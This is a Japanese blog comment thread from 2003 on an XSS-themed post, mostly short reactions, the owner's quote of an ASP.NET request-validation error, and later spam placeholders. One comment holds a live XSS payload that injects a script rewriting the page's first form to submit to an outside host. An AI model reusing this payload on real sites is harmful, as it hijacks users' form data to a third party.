水無月ばけらのえび日記

bakera.jp > 水無月ばけらのえび日記 > DOM万歳(XSS大王つづき) > 「DOM万歳(XSS大王つづき)」へのコメント

「DOM万歳(XSS大王つづき)」へのコメント

水無月ばけらのえび日記 : DOM万歳(XSS大王つづき)」について、29件のコメントが書かれています。

[132] Re: えび日記 : 「DOM万歳(XSS大王つづき)」

いわい (2003年6月24日 22時28分)

やりすぎというか、やられすぎというか(謎)。

XSSって怖いですね(ベタ)。

[134] Re: えび日記 : 「DOM万歳(XSS大王つづき)」

えむけい (2003年6月24日 23時11分)

test

[135] Re: えび日記 : 「DOM万歳(XSS大王つづき)」

えむけい (2003年6月24日 23時12分)

なんかタグを含む投稿で? エラーになります。再挑戦

"><script>document.forms[0].action="http://altba.com";document.forms[0].method="get"</script><span

[136] Re: えび日記 : 「DOM万歳(XSS大王つづき)」

えむけい (2003年6月24日 23時15分)

なぜかここに投稿しようとするとエラーになるのでよりaccesibleな【謎】exploitはとりあえずポータル墓場に投稿しておきます。

http://white.sakura.ne.jp/~rryu/hakaba/bbs.cgi?mode=mes&id=1351

[137] Re: えび日記 : 「DOM万歳(XSS大王つづき)」

ばけら (2003年6月25日 11時52分)

>なぜかここに投稿しようとするとエラーになるので

 どんなエラーが出ていましたか?

 実は ASP.NET 自体にヤバ目な POST を弾く機能があったりするので、そのせいかもしれません。

[138] Re: えび日記 : 「DOM万歳(XSS大王つづき)」

ばけら (2003年6月25日 11時56分)

>>なぜかここに投稿しようとするとエラーになるので

 調査しましたが、やはり ASP.NET 自身がこういうエラーを出してますね。

================

危険な可能性のある Request.Form 値がクライアントから検出されました。

説明 : 要求の検証により、危険性のあるクライアント入力値が検出されました。要求の処理は中止されました。この値は、クロス サイト スクリプト攻撃などのアプリケーションのセキュリティ問題を引き起こす可能性があります。ページ ディレクティブか、 構成セクションの validateRequest=false を設定することによって要求の検証を無効にできます。しかしこの場合、アプリケーションですべての入力を明示的に確認することをお勧めします。

例外の詳細: System.Web.HttpRequestValidationException: 危険な可能性のある Request.Form 値がクライアントから検出されました。

================

 この機能はオフにできるはずなので、ちょっと調べてみます。

[3769] 未承認メッセージ (投稿元:220.80.30.43)

reogkzt lyrqnhj (2006年7月25日 17時21分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[3797] 未承認メッセージ (投稿元:58.233.138.152)

ncwevljtm vkhc (2006年8月17日 7時50分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[5951] 未承認メッセージ (投稿元:193.105.210.162)

xagXyLMau (2010年8月12日 11時38分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[6061] 未承認メッセージ (投稿元:218.75.75.246)

samanta (2010年9月1日 9時15分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[6066] 未承認メッセージ (投稿元:91.201.66.142)

HkETbRYnetyRsrNAEuJ (2010年9月4日 23時43分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[6094] 未承認メッセージ (投稿元:188.92.75.82)

lckieberb (2010年9月18日 14時21分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[6127] 未承認メッセージ (投稿元:213.5.70.184)

tnXNCEpQF (2010年9月27日 0時12分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[6131] 未承認メッセージ (投稿元:91.214.45.223)

heaqeexvplb (2010年9月27日 11時5分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[6135] 未承認メッセージ (投稿元:91.214.44.123)

ABJnpMofGhbiKjjcCp (2010年9月28日 14時47分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[6149] 未承認メッセージ (投稿元:213.5.64.15)

SAYTlwwEsGsf (2010年10月2日 7時11分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[6190] 未承認メッセージ (投稿元:213.5.64.15)

PCixjbZtHANSY (2010年10月9日 21時47分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[6210] 未承認メッセージ (投稿元:213.5.64.15)

fbfkxAHExeYKSBQI (2010年10月15日 21時8分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[6266] 未承認メッセージ (投稿元:188.92.77.12)

mdsdvsq (2010年11月13日 8時32分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[6283] 未承認メッセージ (投稿元:94.102.49.76)

WXOOUviJbRTYLKfm (2010年11月23日 8時38分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[6397] 未承認メッセージ (投稿元:79.142.69.75)

iDIFbwzWXDOom (2011年2月3日 6時20分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[6528] 未承認メッセージ (投稿元:67.23.249.241)

kHvAopTTJohptPfoNs (2011年3月29日 8時11分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[6608] 未承認メッセージ (投稿元:193.23.51.5)

fwhddt (2011年5月7日 2時52分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[6631] 未承認メッセージ (投稿元:212.129.66.131)

GYwiNtXHTqNroQU (2011年6月1日 21時36分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[6938] 未承認メッセージ (投稿元:188.143.232.31)

rdsrnl (2011年11月4日 0時52分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[7479] 未承認メッセージ (投稿元:46.21.144.52)

jtzqdgizv (2012年8月1日 17時4分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[7776] 未承認メッセージ (投稿元:46.21.144.52)

urcjqb (2012年10月30日 23時23分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[8115] 未承認メッセージ (投稿元:46.21.144.52)

hynykqt (2013年1月15日 13時1分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

[8116] 未承認メッセージ (投稿元:46.21.144.52)

zjpggs (2013年1月15日 13時1分)

(この記事は承認されていないため、管理者が許可するまで公開されません。)

水無月ばけらのえび日記 : DOM万歳(XSS大王つづき)」についてコメントを書く場合は、以下のフォームに記入してください。

新規投稿フォーム

※広告や宣伝の書き込みはご遠慮ください。

:

:

:

最近の日記

関わった本など